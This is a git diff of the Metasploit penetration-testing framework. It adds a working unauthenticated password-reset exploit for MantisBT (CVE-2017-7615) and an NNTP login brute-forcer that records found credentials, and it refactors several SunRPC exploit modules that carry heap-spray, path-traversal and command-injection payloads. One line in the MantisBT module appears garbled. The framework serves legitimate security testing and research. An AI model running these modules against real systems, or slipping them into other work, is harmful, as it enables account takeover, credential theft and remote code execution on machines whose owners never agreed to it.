diff --git a/Gemfile.lock b/Gemfile.lock
index 6da285dbd2..68976ee3b4 100644
--- a/Gemfile.lock
+++ b/Gemfile.lock
@@ -1,7 +1,7 @@
PATH
remote: .
specs:
- metasploit-framework (4.15.0)
+ metasploit-framework (4.15.1)
actionpack (~> 4.2.6)
activerecord (~> 4.2.6)
activesupport (~> 4.2.6)
diff --git a/documentation/modules/auxiliary/admin/http/mantisbt_password_reset.md b/documentation/modules/auxiliary/admin/http/mantisbt_password_reset.md
new file mode 100644
index 0000000000..92d8f908e3
--- /dev/null
+++ b/documentation/modules/auxiliary/admin/http/mantisbt_password_reset.md
@@ -0,0 +1,30 @@
+## Vulnerable Application
+
+MantisBT before 1.3.10, 2.2.4, and 2.3.1, that can be downloaded
+on
+[Sourceforge](https://sourceforge.net/projects/mantisbt/files/mantis-stable/).
+
+## Verification Steps
+
+ 1. Install the vulnerable software
+ 2. Start msfconsole
+ 3. Do: ```use auxiliary/admin/http/mantisbt_password_reset```
+ 4. Do: ```set rhost```
+ 5. Do: ```run```
+ 6. If the system is vulnerable, the module should tell you that the password
+ was successfully changed.
+
+## Scenarios
+
+ ```
+ msf > use auxiliary/admin/http/mantisbt_password_reset
+ msf auxiliary(mantisbt_password_reset) > set rport 8082
+ rport => 8082
+ msf auxiliary(mantisbt_password_reset) > set rhost 127.0.0.1
+ rhost => 127.0.0.1
+ msf auxiliary(mantisbt_password_reset) > run
+
+ [+] Password successfully changed to 'ndOQTmhQ'.
+ [*] Auxiliary module execution completed
+ msf auxiliary(mantisbt_password_reset) >
+ ```
diff --git a/documentation/modules/auxiliary/scanner/nntp/nntp_login.md b/documentation/modules/auxiliary/scanner/nntp/nntp_login.md
new file mode 100644
index 0000000000..dbeda3730c
--- /dev/null
+++ b/documentation/modules/auxiliary/scanner/nntp/nntp_login.md
@@ -0,0 +1,42 @@
+## Description
+
+ This module attempts to authenticate to NNTP services which support the AUTHINFO authentication extension.
+
+ This module supports AUTHINFO USER/PASS authentication, but does not support AUTHINFO GENERIC or AUTHINFO SASL authentication methods.
+
+ If you have loaded a database plugin and connected to a database this module will record successful logins and hosts so you can track your access.
+
+
+## Vulnerable Application
+
+ This module has been tested successfully on:
+
+ * [SurgeNews](http://netwinsite.com/surgenews/) on Windows 7 SP 1.
+ * [SurgeNews](http://netwinsite.com/surgenews/) on Ubuntu Linux.
+ * [INN2](https://www.eyrie.org/~eagle/faqs/inn.html) on Debian Linux.
+
+
+## Verification Steps
+
+ 1. Do: `use auxiliary/scanner/nntp/nntp_login`
+ 2. Do: `set RHOSTS [IP]`
+ 3. Do: `set RPORT [IP]`
+ 4. Do: `run`
+
+
+## Scenarios
+
+ ```
+ msf auxiliary(nntp_login) > run
+
+ [+] 172.16.191.166:119 - 172.16.191.166:119 Successful login with: 'asdf' : 'asdf'
+ [+] 172.16.191.166:119 - 172.16.191.166:119 Successful login with: 'zxcv' : 'zxcv'
+ [+] 172.16.191.166:119 - 172.16.191.166:119 Successful login with: 'test' : 'test'
+ [*] Scanned 1 of 2 hosts (50% complete)
+ [+] 172.16.191.213:119 - 172.16.191.213:119 Successful login with: 'asdf' : 'asdf'
+ [+] 172.16.191.213:119 - 172.16.191.213:119 Successful login with: 'admin' : 'admin'
+ [+] 172.16.191.213:119 - 172.16.191.213:119 Successful login with: 'user' : 'pass'
+ [*] Scanned 2 of 2 hosts (100% complete)
+ [*] Auxiliary module execution completed
+ ```
+
diff --git a/lib/metasploit/framework/version.rb b/lib/metasploit/framework/version.rb
index 6a755e1d7e..ad726fc009 100644
--- a/lib/metasploit/framework/version.rb
+++ b/lib/metasploit/framework/version.rb
@@ -30,7 +30,7 @@ module Metasploit
end
end
- VERSION = "4.15.0"
+ VERSION = "4.15.1"
MAJOR, MINOR, PATCH = VERSION.split('.').map { |x| x.to_i }
PRERELEASE = 'dev'
HASH = get_hash
diff --git a/lib/msf/core/exploit/sunrpc.rb b/lib/msf/core/exploit/sunrpc.rb
index 265bea4ac5..92e9af2293 100644
--- a/lib/msf/core/exploit/sunrpc.rb
+++ b/lib/msf/core/exploit/sunrpc.rb
@@ -16,8 +16,6 @@ module Msf
module Exploit::Remote::SunRPC
include Exploit::Remote::Tcp
- XDR = Rex::Encoder::XDR
-
MSG_ACCEPTED = 0
SUCCESS = 0 # RPC executed successfully
PROG_UMAVAIL = 1 # Remote hasn't exported program
@@ -72,7 +70,7 @@ module Exploit::Remote::SunRPC
ret = rpcobj.create
raise ::Rex::Proto::SunRPC::RPCError, "#{rhost}:#{rport} - SunRPC - No response to Portmap request" unless ret
- arr = XDR.decode!(ret, Integer, Integer, Integer, String, Integer, Integer)
+ arr = Rex::Encoder::XDR.decode!(ret, Integer, Integer, Integer, String, Integer, Integer)
if arr[1] != MSG_ACCEPTED || arr[4] != SUCCESS || arr[5] == 0
err = "#{rhost}:#{rport} - SunRPC - Portmap request failed: "
err << 'Message not accepted' if arr[1] != MSG_ACCEPTED
diff --git a/lib/msf/ui/console/command_dispatcher/resource.rb b/lib/msf/ui/console/command_dispatcher/resource.rb
index 846089c64d..b020bd743f 100644
--- a/lib/msf/ui/console/command_dispatcher/resource.rb
+++ b/lib/msf/ui/console/command_dispatcher/resource.rb
@@ -37,8 +37,8 @@ module Msf
def cmd_resource_help
print_line "Usage: resource path1 [path2 ...]"
print_line
- print_line "Run the commands stored in the supplied files. Resource files may also contain"
- print_line "ruby code between tags."
+ print_line "Run the commands stored in the supplied files (- for stdin)."
+ print_line "Resource files may also contain ERB or Ruby code between tags."
print_line
print_line "See also: makerc"
print_line
@@ -52,21 +52,23 @@ module Msf
args.each do |res|
good_res = nil
- if ::File.exist?(res)
+ if res == '-'
+ good_res = res
+ elsif ::File.exist?(res)
good_res = res
elsif
# let's check to see if it's in the scripts/resource dir (like when tab completed)
- [
- ::Msf::Config.script_directory + ::File::SEPARATOR + "resource",
- ::Msf::Config.user_script_directory + ::File::SEPARATOR + "resource"
- ].each do |dir|
- res_path = dir + ::File::SEPARATOR + res
- if ::File.exist?(res_path)
- good_res = res_path
- break
+ [
+ ::Msf::Config.script_directory + ::File::SEPARATOR + "resource",
+ ::Msf::Config.user_script_directory + ::File::SEPARATOR + "resource"
+ ].each do |dir|
+ res_path = dir + ::File::SEPARATOR + res
+ if ::File.exist?(res_path)
+ good_res = res_path
+ break
+ end
end
end
- end
if good_res
driver.load_resource(good_res)
else
diff --git a/lib/rex/post/meterpreter/extensions/stdapi/fs/file.rb b/lib/rex/post/meterpreter/extensions/stdapi/fs/file.rb
index 5ec16f86fc..72ab8bfa71 100644
--- a/lib/rex/post/meterpreter/extensions/stdapi/fs/file.rb
+++ b/lib/rex/post/meterpreter/extensions/stdapi/fs/file.rb
@@ -373,7 +373,7 @@ class File < Rex::Post::Meterpreter::Extensions::Stdapi::Fs::IO
end
# Keep transferring until EOF is reached...
- block_size = opts['block_size'] || 1024 * 1024
+ block_size = (opts && opts['block_size']) || 1024 * 1024
begin
if tries
# resume when timeouts encountered
diff --git a/modules/auxiliary/admin/http/mantisbt_password_reset.rb b/modules/auxiliary/admin/http/mantisbt_password_reset.rb
new file mode 100644
index 0000000000..b07ab2b064
--- /dev/null
+++ b/modules/auxiliary/admin/http/mantisbt_password_reset.rb
@@ -0,0 +1,113 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+## Current source: https://github.com/rapid7/metasploit-framework
+###
+
+class MetasploitModule < Msf::Auxiliary
+ include Msf::Exploit::Remote::HttpClient
+
+ def initialize(info={})
+ super(update_info(info,
+ 'Name' => "MantisBT password reset",
+ 'Description' => %q{
+ MantisBT before 1.3.10, 2.2.4, and 2.3.1 are vulnerable to unauthenticated password reset.
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' =>
+ [
+ 'John (hyp3rlinx) Page', # initial discovery
+ 'Julien (jvoisin) Voisin' # metasploit module
+ ],
+ 'References' =>
+ [
+ ['CVE', '2017-7615'],
+ ['EDB', '41890'],
+ ['URL', 'https://mantisbt.org/bugs/view.php?id=22690'],
+ ['URL', 'http://hyp3rlinx.altervista.org/advisories/MANTIS-BUG-TRACKER-PRE-AUTH-REMOTE-PASSWORD-RESET.txt']
+ ],
+ 'Platform' => ['win', 'linux'],
+ 'DisclosureDate' => "Apr 16 2017"))
+
+ register_options(
+ [
+ OptString.new('USERID', [ true, 'User id to reset', 1]),
+ OptString.new('PASSWORD', [ false, 'The new password to set (blank for random)', '']),
+ OptString.new('TARGETURI', [ true, 'Relative URI of MantisBT installation', '/'])
+ ]
+ )
+ end
+
+ def check
+ begin
+ res = send_request_cgi({
+ 'uri' => normalize_uri(target_uri.path, '/login_page.php'),
+ 'method'=>'GET'
+ })
+
+ if res && res.body && res.body.include?('Powered by MantisBT')
+ vprint_status("MantisBT detected")
+ return Exploit::CheckCode::Detected
+ else
+ vprint_status("Not a MantisBT Instance!")
+ return Exploit::CheckCode::Safe
+ end
+
+ rescue Rex::ConnectionRefused
+ print_error("Connection refused by server.")
+ return Exploit::CheckCode::Safe
+ end
+ end
+
+ def run
+ res = send_request_cgi({
+ 'uri' => normalize_uri(target_uri.path, '/verify.php'),
+ 'method' => 'GET',
+ 'vars_get' => {
+ 'id' => datastore['USERID'],
+ 'confirm_hash' => ''
+ }
+ })
+
+ if !res || !res.body
+ fail_with(Failure::UnexpectedReply, "Error in server response. Ensure the server IP is correct.")
+ end
+
+ cookie = res.get_cookies
+
+ if cookie == '' || !(res.body.include? 'Your account information has been verified.')
+ fail_with(Failure::NoAccess, "Authentication failed")
+ end
+
+
+ if datastore['PASSWORD'].blank?
+ password = Rex::Text.rand_text_alpha(8)
+ else
+ password = datastore['PASSWORD']
+ end
+
+ if res.body =~ / normalize_uri(target_uri.path, '/account_update.php'),
+ 'method' => 'POST',
+ 'vars_post' => {
+ 'verify_user_id' => datastore['USERID'],
+ 'account_update_token' => $1,
+ 'realname' => Rex::Text.rand_text_alpha(rand(5) + 8),
+ 'password' => password,
+ 'password_confirm' => password
+ },
+ 'cookie' => cookie
+ })
+
+ if res && res.body && res.body.include?('Password successfully updated')
+ print_good("Password successfully changed to '#{password}'.")
+ else
+ fail_with(Failure::UnexpectedReply, 'Something went wrong, the password was not changed.')
+ end
+ end
+end
diff --git a/modules/auxiliary/admin/sunrpc/solaris_kcms_readfile.rb b/modules/auxiliary/admin/sunrpc/solaris_kcms_readfile.rb
index 0f374193d0..f7cd207316 100644
--- a/modules/auxiliary/admin/sunrpc/solaris_kcms_readfile.rb
+++ b/modules/auxiliary/admin/sunrpc/solaris_kcms_readfile.rb
@@ -66,14 +66,14 @@ class MetasploitModule < Msf::Auxiliary
# Prepare the traversing request for kcms_server
trav = 'TT_DB/' + ('../' * 5) + path
- buf = XDR.encode(
+ buf = Rex::Encoder::XDR.encode(
[trav, 1024],
0, # O_RDONLY
0755) # mode
# Make the request
ret = sunrpc_call(1003, buf)
- ack, fsize, fd = XDR.decode!(ret, Integer, Integer, Integer)
+ ack, fsize, fd = Rex::Encoder::XDR.decode!(ret, Integer, Integer, Integer)
if (ack != 0)
print_error("KCMS open() failed (ack: 0x%x != 0)" % ack)
@@ -88,13 +88,13 @@ class MetasploitModule < Msf::Auxiliary
print_status("fd: #{fd}, file size #{fsize}")
print_status("Making read() request to the kcms_server...")
- buf = XDR.encode(
+ buf = Rex::Encoder::XDR.encode(
fd,
0,
fsize)
ret = sunrpc_call(1005, buf)
- x, data = XDR.decode!(ret, Integer, [Integer])
+ x, data = Rex::Encoder::XDR.decode!(ret, Integer, [Integer])
# If we got something back...
if (data)
@@ -118,7 +118,7 @@ class MetasploitModule < Msf::Auxiliary
# Close it regardless if it returned anything..
print_status("Making close() request to the kcms_server...")
- buf = XDR.encode(fd)
+ buf = Rex::Encoder::XDR.encode(fd)
sunrpc_call(1004, buf)
# done
@@ -138,7 +138,7 @@ class MetasploitModule < Msf::Auxiliary
def ttdb_build(path)
sunrpc_create('tcp', 100083, 1)
sunrpc_authunix('localhost', 0, 0, [])
- msg = XDR.encode(
+ msg = Rex::Encoder::XDR.encode(
[path, 1024],
path.length,
1, # KEY (VArray head?)
@@ -152,7 +152,7 @@ class MetasploitModule < Msf::Auxiliary
0x10002,
path.length)
ret = sunrpc_call(3, msg)
- arr = XDR.decode!(ret, Integer, Integer)
+ arr = Rex::Encoder::XDR.decode!(ret, Integer, Integer)
print_status("TTDB reply: 0x%x, %d" % arr)
sunrpc_destroy
end
diff --git a/modules/auxiliary/scanner/misc/sunrpc_portmapper.rb b/modules/auxiliary/scanner/misc/sunrpc_portmapper.rb
index b33bef9a61..36ed87f52c 100644
--- a/modules/auxiliary/scanner/misc/sunrpc_portmapper.rb
+++ b/modules/auxiliary/scanner/misc/sunrpc_portmapper.rb
@@ -40,8 +40,8 @@ class MetasploitModule < Msf::Auxiliary
progs = resp[3, 1].unpack('C')[0]
maps = []
if (progs == 0x01)
- while XDR.decode_int!(resp) == 1
- maps << XDR.decode!(resp, Integer, Integer, Integer, Integer)
+ while Rex::Encoder::XDR.decode_int!(resp) == 1
+ maps << Rex::Encoder::XDR.decode!(resp, Integer, Integer, Integer, Integer)
end
end
sunrpc_destroy
diff --git a/modules/auxiliary/scanner/nfs/nfsmount.rb b/modules/auxiliary/scanner/nfs/nfsmount.rb
index 10a0c07517..aa61c9a9af 100644
--- a/modules/auxiliary/scanner/nfs/nfsmount.rb
+++ b/modules/auxiliary/scanner/nfs/nfsmount.rb
@@ -56,11 +56,11 @@ class MetasploitModule < Msf::Auxiliary
exports = resp[3,1].unpack('C')[0]
if (exports == 0x01)
shares = []
- while XDR.decode_int!(resp) == 1 do
- dir = XDR.decode_string!(resp)
+ while Rex::Encoder::XDR.decode_int!(resp) == 1 do
+ dir = Rex::Encoder::XDR.decode_string!(resp)
grp = []
- while XDR.decode_int!(resp) == 1 do
- grp << XDR.decode_string!(resp)
+ while Rex::Encoder::XDR.decode_int!(resp) == 1 do
+ grp << Rex::Encoder::XDR.decode_string!(resp)
end
print_good("#{ip} NFS Export: #{dir} [#{grp.join(", ")}]")
shares << [dir, grp]
diff --git a/modules/auxiliary/scanner/nntp/nntp_login.rb b/modules/auxiliary/scanner/nntp/nntp_login.rb
new file mode 100644
index 0000000000..aeed297540
--- /dev/null
+++ b/modules/auxiliary/scanner/nntp/nntp_login.rb
@@ -0,0 +1,189 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+
+ include Msf::Auxiliary::Report
+ include Msf::Auxiliary::AuthBrute
+ include Msf::Auxiliary::Scanner
+ include Msf::Exploit::Remote::Tcp
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'NNTP Login Utility',
+ 'Description' => %q{
+ This module attempts to authenticate to NNTP services
+ which support the AUTHINFO authentication extension.
+
+ This module supports AUTHINFO USER/PASS authentication,
+ but does not support AUTHINFO GENERIC or AUTHINFO SASL
+ authentication methods.
+ },
+ 'Author' => 'Brendan Coles ',
+ 'License' => MSF_LICENSE,
+ 'References' => [ [ 'CVE', '1999-0502' ], # Weak password
+ [ 'URL', 'https://tools.ietf.org/html/rfc3977' ],
+ [ 'URL', 'https://tools.ietf.org/html/rfc4642' ],
+ [ 'URL', 'https://tools.ietf.org/html/rfc4643' ] ]))
+ register_options(
+ [
+ Opt::RPORT(119),
+ OptPath.new('USER_FILE', [ false, 'The file that contains a list of probable usernames.',
+ File.join(Msf::Config.install_root, 'data', 'wordlists', 'unix_users.txt') ]),
+ OptPath.new('PASS_FILE', [ false, 'The file that contains a list of probable passwords.',
+ File.join(Msf::Config.install_root, 'data', 'wordlists', 'unix_passwords.txt') ])
+ ])
+ deregister_options 'RHOST'
+ end
+
+ def run_host(ip)
+ begin
+ connect
+ return :abort unless nntp?
+ return :abort unless supports_authinfo?
+
+ report_service :host => rhost,
+ :port => rport,
+ :proto => 'tcp',
+ :name => 'nntp'
+ disconnect
+
+ each_user_pass { |user, pass| do_login user, pass }
+ rescue ::Interrupt
+ raise $ERROR_INFO
+ rescue EOFError, ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
+ print_error "#{peer} Connection failed"
+ return
+ rescue OpenSSL::SSL::SSLError => e
+ print_error "SSL negotiation failed: #{e}"
+ rescue => e
+ print_error "#{peer} Error: #{e.class} #{e} #{e.backtrace}"
+ return
+ ensure
+ disconnect
+ end
+ end
+
+ def nntp?
+ banner = sock.get_once
+
+ if !banner
+ vprint_error "#{peer} No response"
+ return false
+ end
+
+ if banner !~ /^200/
+ print_error 'Unexpected reply'
+ return false
+ end
+
+ vprint_status 'Server is a NTTP server'
+ vprint_status "Banner: #{banner}"
+ true
+ end
+
+ def supports_authinfo?
+ sock.put "HELP\r\n"
+ res = sock.get(-1)
+ code = res.scan(/\A(\d+)\s/).flatten.first.to_i
+
+ if code.nil?
+ print_error 'Server is not a NNTP server'
+ return false
+ end
+
+ if code == 480
+ vprint_warning 'Authentication is required before listing authentication capabilities.'
+ return true
+ end
+
+ if code == 100 && res =~ /authinfo/i
+ vprint_status 'Server supports AUTHINFO'
+ return true
+ end
+
+ print_error 'Server does not support AUTHINFO'
+ false
+ end
+
+ def do_login(user, pass)
+ vprint_status "Trying username:'#{user}' with password:'#{pass}'"
+
+ begin
+ connect
+ sock.get_once
+
+ sock.put "AUTHINFO USER #{user}\r\n"
+ res = sock.get_once
+ unless res
+ vprint_error "#{peer} No response"
+ return :abort
+ end
+
+ code = res.scan(/\A(\d+)\s/).flatten.first.to_i
+ if code != 381
+ vprint_error "#{peer} Unexpected reply. Skipping user..."
+ return :skip_user
+ end
+
+ sock.put "AUTHINFO PASS #{pass}\r\n"
+ res = sock.get_once
+ unless res
+ vprint_error "#{peer} No response"
+ return :abort
+ end
+
+ code = res.scan(/\A(\d+)\s/).flatten.first.to_i
+ if code == 452 || code == 481
+ vprint_error "#{peer} Login failed"
+ return
+ elsif code == 281
+ print_good "#{peer} Successful login with: '#{user}' : '#{pass}'"
+ report_cred ip: rhost,
+ port: rport,
+ service_name: 'nntp',
+ user: user,
+ password: pass,
+ proof: code.to_s
+ return :next_user
+ else
+ vprint_error "#{peer} Failed login as: '#{user}' - Unexpected reply: #{res.inspect}"
+ return
+ end
+ rescue EOFError, ::Rex::ConnectionError, ::Errno::ECONNREFUSED, ::Errno::ETIMEDOUT
+ print_error 'Connection failed'
+ return
+ rescue OpenSSL::SSL::SSLError => e
+ print_error "SSL negotiation failed: #{e}"
+ return :abort
+ end
+ rescue => e
+ print_error "Error: #{e}"
+ return nil
+ ensure
+ disconnect
+ end
+
+ def report_cred(opts)
+ service_data = { address: opts[:ip],
+ port: opts[:port],
+ service_name: opts[:service_name],
+ protocol: 'tcp',
+ workspace_id: myworkspace_id }
+
+ credential_data = { origin_type: :service,
+ module_fullname: fullname,
+ username: opts[:user],
+ private_data: opts[:password],
+ private_type: :password }.merge service_data
+
+ login_data = { last_attempted_at: DateTime.now,
+ core: create_credential(credential_data),
+ status: Metasploit::Model::Login::Status::SUCCESSFUL,
+ proof: opts[:proof] }.merge service_data
+
+ create_credential_login login_data
+ end
+end
diff --git a/modules/exploits/aix/rpc_cmsd_opcode21.rb b/modules/exploits/aix/rpc_cmsd_opcode21.rb
index f974f5ee56..48e951c0f6 100644
--- a/modules/exploits/aix/rpc_cmsd_opcode21.rb
+++ b/modules/exploits/aix/rpc_cmsd_opcode21.rb
@@ -83,7 +83,7 @@ class MetasploitModule < Msf::Exploit::Remote
# spray the heap a bit (work around powerpc cache issues)
buf = make_nops(1024 - @aixpayload.length)
buf << @aixpayload
- xdr = XDR.encode(buf, buf)
+ xdr = Rex::Encoder::XDR.encode(buf, buf)
10.times {
sunrpc_call(7, xdr, 2)
}
@@ -93,7 +93,7 @@ class MetasploitModule < Msf::Exploit::Remote
buf = rand_text_alphanumeric(payload_space)
buf << [brute_target['Ret']].pack('N')
- xdr = XDR.encode(buf, "")
+ xdr = Rex::Encoder::XDR.encode(buf, "")
sunrpc_authunix('localhost', 0, 0, [])
sunrpc_call(21, xdr, 2)
diff --git a/modules/exploits/aix/rpc_ttdbserverd_realpath.rb b/modules/exploits/aix/rpc_ttdbserverd_realpath.rb
index 27a6b75d66..32db2e25d3 100644
--- a/modules/exploits/aix/rpc_ttdbserverd_realpath.rb
+++ b/modules/exploits/aix/rpc_ttdbserverd_realpath.rb
@@ -262,7 +262,7 @@ class MetasploitModule < Msf::Exploit::Remote
buf << "\x7f\xff\xfb\x78" * 1920
buf << @aixpayload
- buf = XDR.encode(buf, 2, 0x78000000, 2, 0x78000000)
+ buf = Rex::Encoder::XDR.encode(buf, 2, 0x78000000, 2, 0x78000000)
print_status('Sending procedure 15 call message...')
sunrpc_call(15, buf)
diff --git a/modules/exploits/multi/http/php_cgi_arg_injection.rb b/modules/exploits/multi/http/php_cgi_arg_injection.rb
index b9e31e6c39..10ba07a5e9 100644
--- a/modules/exploits/multi/http/php_cgi_arg_injection.rb
+++ b/modules/exploits/multi/http/php_cgi_arg_injection.rb
@@ -114,7 +114,6 @@ class MetasploitModule < Msf::Exploit::Remote
create_arg("-d","auto_prepend_file=php://input"),
create_arg("-d", "cgi.force_redirect=#{rand_php_ini_false}"),
create_arg("-d", "cgi.redirect_status_env=0"),
- create_arg("-d", "suhosin.simulation=#{rand_php_ini_true}"),
rand_opt_equiv("-n")
]
diff --git a/modules/exploits/solaris/sunrpc/sadmind_adm_build_path.rb b/modules/exploits/solaris/sunrpc/sadmind_adm_build_path.rb
index 5e369c2206..5dc5a137c4 100644
--- a/modules/exploits/solaris/sunrpc/sadmind_adm_build_path.rb
+++ b/modules/exploits/solaris/sunrpc/sadmind_adm_build_path.rb
@@ -121,8 +121,8 @@ class MetasploitModule < Msf::Exploit::Remote
buf2 = @nops + payload.encoded
header =
- XDR.encode(0) * 7 +
- XDR.encode(6, 0, 0, 0, 4, 0, 4, 0x7f000001, 100232, 10,
+ Rex::Encoder::XDR.encode(0) * 7 +
+ Rex::Encoder::XDR.encode(6, 0, 0, 0, 4, 0, 4, 0x7f000001, 100232, 10,
4, 0x7f000001, 100232, 10, 17, 30, 0, 0, 0, 0,
hostname, 'system', rand_text_alpha(16))
@@ -139,9 +139,9 @@ class MetasploitModule < Msf::Exploit::Remote
do_string('ADM_TIMEOUT_PARMS', 'TTL=0 PTO=20 PCNT=2 PDLY=30') +
do_int('ADM_FENCE', 0) +
do_string('X', buf2) +
- XDR.encode('netmgt_endofargs')
+ Rex::Encoder::XDR.encode('netmgt_endofargs')
- request = header + XDR.encode(header.length + body.length - 326) + body
+ request = header + Rex::Encoder::XDR.encode(header.length + body.length - 326) + body
begin
# two seconds timeout for brute force
@@ -157,11 +157,11 @@ class MetasploitModule < Msf::Exploit::Remote
end
def do_string(str1, str2)
- XDR.encode(str1, 9, str2.length + 1, str2, 0, 0)
+ Rex::Encoder::XDR.encode(str1, 9, str2.length + 1, str2, 0, 0)
end
def do_int(str, int)
- XDR.encode(str, 3, 4, int, 0, 0)
+ Rex::Encoder::XDR.encode(str, 3, 4, int, 0, 0)
end
end
diff --git a/modules/exploits/solaris/sunrpc/sadmind_exec.rb b/modules/exploits/solaris/sunrpc/sadmind_exec.rb
index 496aec53db..2ee5b3fcbe 100644
--- a/modules/exploits/solaris/sunrpc/sadmind_exec.rb
+++ b/modules/exploits/solaris/sunrpc/sadmind_exec.rb
@@ -97,8 +97,8 @@ class MetasploitModule < Msf::Exploit::Remote
def sadmind_request(host, command)
header =
- XDR.encode(0) * 7 +
- XDR.encode(6, 0, 0, 0, 4, 0, 4, 0x7f000001, 100232, 10,
+ Rex::Encoder::XDR.encode(0) * 7 +
+ Rex::Encoder::XDR.encode(6, 0, 0, 0, 4, 0, 4, 0x7f000001, 100232, 10,
4, 0x7f000001, 100232, 10, 17, 30, 0, 0, 0, 0,
host, 'system', '../../../bin/sh')
@@ -116,19 +116,19 @@ class MetasploitModule < Msf::Exploit::Remote
do_int('ADM_FENCE', 0) +
do_string('X', '-c') +
do_string('Y', command) +
- XDR.encode('netmgt_endofargs')
+ Rex::Encoder::XDR.encode('netmgt_endofargs')
- request = header + XDR.encode(header.length + body.length - 326) + body
+ request = header + Rex::Encoder::XDR.encode(header.length + body.length - 326) + body
ret = sunrpc_call(1, request)
- return XDR.decode!(ret, Integer, Integer, String)[2]
+ return Rex::Encoder::XDR.decode!(ret, Integer, Integer, String)[2]
end
def do_string(str1, str2)
- XDR.encode(str1, 9, str2.length + 1, str2, 0, 0)
+ Rex::Encoder::XDR.encode(str1, 9, str2.length + 1, str2, 0, 0)
end
def do_int(str, int)
- XDR.encode(str, 3, 4, int, 0, 0)
+ Rex::Encoder::XDR.encode(str, 3, 4, int, 0, 0)
end
end
diff --git a/modules/exploits/solaris/sunrpc/ypupdated_exec.rb b/modules/exploits/solaris/sunrpc/ypupdated_exec.rb
index d0d50126d8..d8181c4bc3 100644
--- a/modules/exploits/solaris/sunrpc/ypupdated_exec.rb
+++ b/modules/exploits/solaris/sunrpc/ypupdated_exec.rb
@@ -69,7 +69,7 @@ class MetasploitModule < Msf::Exploit::Remote
print_status('Waiting for response...')
sunrpc_authunix(hostname, datastore['UID'], datastore['GID'], [])
command = '|' + payload.encoded
- msg = XDR.encode(command, 2, 0x78000000, 2, 0x78000000)
+ msg = Rex::Encoder::XDR.encode(command, 2, 0x78000000, 2, 0x78000000)
sunrpc_call(procedure, msg)
sunrpc_destroy
diff --git a/modules/exploits/windows/brightstor/mediasrv_sunrpc.rb b/modules/exploits/windows/brightstor/mediasrv_sunrpc.rb
index dbe5adb009..10b500d7d4 100644
--- a/modules/exploits/windows/brightstor/mediasrv_sunrpc.rb
+++ b/modules/exploits/windows/brightstor/mediasrv_sunrpc.rb
@@ -262,7 +262,7 @@ class MetasploitModule < Msf::Exploit::Remote
data = "_" + data + "_1_1_1_1_1_1_1_1_1"
- request = XDR.encode(1, 1, 2, 2, 2, data, 3, 3)
+ request = Rex::Encoder::XDR.encode(1, 1, 2, 2, 2, data, 3, 3)
print_status("Trying target #{target.name}...")
diff --git a/modules/exploits/windows/emc/networker_format_string.rb b/modules/exploits/windows/emc/networker_format_string.rb
index b5fee3a390..0346154aff 100644
--- a/modules/exploits/windows/emc/networker_format_string.rb
+++ b/modules/exploits/windows/emc/networker_format_string.rb
@@ -108,7 +108,7 @@ class MetasploitModule < Msf::Exploit::Remote
end
fs << payload.encoded
- xdr = XDR.encode(0, 2, rand_text_alpha(10), XDR.encode(fs, rand_text_alpha(10)), 2)
+ xdr = Rex::Encoder::XDR.encode(0, 2, rand_text_alpha(10), Rex::Encoder::XDR.encode(fs, rand_text_alpha(10)), 2)
sunrpc_call(6, xdr)
sunrpc_destroy